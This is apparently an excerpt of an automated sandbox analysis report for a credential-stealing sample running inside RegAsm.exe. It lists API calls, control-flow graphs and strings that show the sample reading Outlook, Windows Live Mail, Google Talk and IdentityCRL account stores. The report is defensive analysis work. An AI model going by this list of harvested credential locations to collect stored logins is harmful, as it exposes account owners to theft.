                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$memcpy$EnumFreeLibraryLoadLocalOpenQueryValuememset
                                                                                                                                                                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 319 402c5d-402c81 call 410a9c 322 402da5-402db0 319->322 323 402c87-402cb7 memset call 410b62 319->323 326 402d9c-402d9f RegCloseKey 323->326 327 402cbd-402cbf 323->327 326->322 328 402cc4-402d2d call 410b1e memset sprintf call 410a9c 327->328 333 402d3a-402d6b sprintf call 410a9c 328->333 334 402d2f-402d35 call 402bd1 328->334 338 402d7a-402d8a call 410b62 333->338 339 402d6d-402d75 call 402bd1 333->339 334->333 342 402d8f-402d94 338->342 339->338 342->328 343 402d9a-402d9b 342->343 343->326
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                  • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                  • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                • memset.MSVCRT ref: 00444379
                                                                                                                                                                                • memset.MSVCRT ref: 00444394
                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                • Store Root, xrefs: 004443A5
                                                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 365 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 370 40f5c3-40f5ea RegQueryValueExA 365->370 371 40f6d9-40f6df 365->371 372 40f6d0-40f6d3 RegCloseKey 370->372 373 40f5f0-40f5f4 370->373 372->371 373->372 374 40f5fa-40f604 373->374 375 40f606-40f618 call 40466b call 404734 374->375 376 40f677 374->376 385 40f66a-40f675 call 404785 375->385 386 40f61a-40f63e call 4047a5 375->386 377 40f67a-40f67d 376->377 377->372 379 40f67f-40f6bf call 4012ee RegQueryValueExA 377->379 379->372 387 40f6c1-40f6cf 379->387 385->377 386->385 392 40f640-40f643 386->392 387->372 393 40f661-40f664 LocalFree 392->393 394 40f645-40f65a memcpy 392->394 393->385 394->393
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValuememset$CloseFreeLibraryLoadLocalOpen_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                • String ID:

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 395 4037ca-40381c memset * 2 call 444551 398 4038e2-4038e5 395->398 399 403822-403882 call 4021b6 call 406f06 * 2 strchr 395->399 406 403884-403895 _mbscpy 399->406 407 403897-4038a2 strlen 399->407 408 4038bf-4038dd _mbscpy call 4023e5 406->408 407->408 409 4038a4-4038bc sprintf 407->409 408->398 409->408
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                • String ID: %s@yahoo.com

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 411 4036e5-4036f5 412 4037c6-4037c7 411->412 413 4036fb-403709 call 410863 411->413 415 40370e-403710 413->415 416 4037c5 415->416 417 403716-40372a strchr 415->417 416->412 417->416 418 403730-403787 call 4021b6 _mbscpy * 2 strlen 417->418 421 4037a4-4037c0 _mbscpy call 4023e5 418->421 422 403789-4037a1 sprintf 418->422 421->416 422->421
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                  • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                • String ID: %s@gmail.com

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 424 404a99-404ac2 LoadLibraryA 425 404ac4-404ad2 424->425 426 404aec-404af4 424->426 430 404ad4-404ad8 425->430 431 404add-404ae6 FreeLibrary 425->431 429 404af5-404afa 426->429 433 404b13-404b17 429->433 434 404afc-404b12 MessageBoxA 429->434 435 404adb 430->435 431->426 432 404ae8-404aea 431->432 432->429 435->431
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoadMessage
                                                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 436 4034e4-403544 memset * 2 call 410b1e 439 403580-403582 436->439 440 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 436->440 440->439
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403504
                                                                                                                                                                                • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                • API String ID: 3071782539-966475738
                                                                                                                                                                                • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 445 410863-41088b UuidFromStringA * 2 446 4108dd 445->446 447 41088d-41088f 445->447 448 4108df-4108e2 446->448 447->446 449 410891-4108aa call 410827 447->449 451 4108af-4108b1 449->451 451->446 452 4108b3-4108b9 451->452 453 4108bb-4108bd 452->453 454 4108be-4108db memcpy CoTaskMemFree 452->454 453->454 454->448
                                                                                                                                                                                APIs
                                                                                                                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                Strings
                                                                                                                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                • API String ID: 1640410171-3316789007
                                                                                                                                                                                • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                • String ID: ACD
                                                                                                                                                                                • API String ID: 1886237854-620537770
                                                                                                                                                                                • Opcode ID: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                                                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                • Opcode Fuzzy Hash: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                                                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2054149589-0
                                                                                                                                                                                • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                • memset.MSVCRT ref: 00408620
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • memset.MSVCRT ref: 00408671
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                • API String ID: 1366857005-1079885057
                                                                                                                                                                                • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFolderLibraryLoadPathSpecialVersion_mbscpymemset
                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                • API String ID: 218411198-2036018995
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                                                • API String ID: 882979914-1578091866
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3143880245-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402A34
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                                                                • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
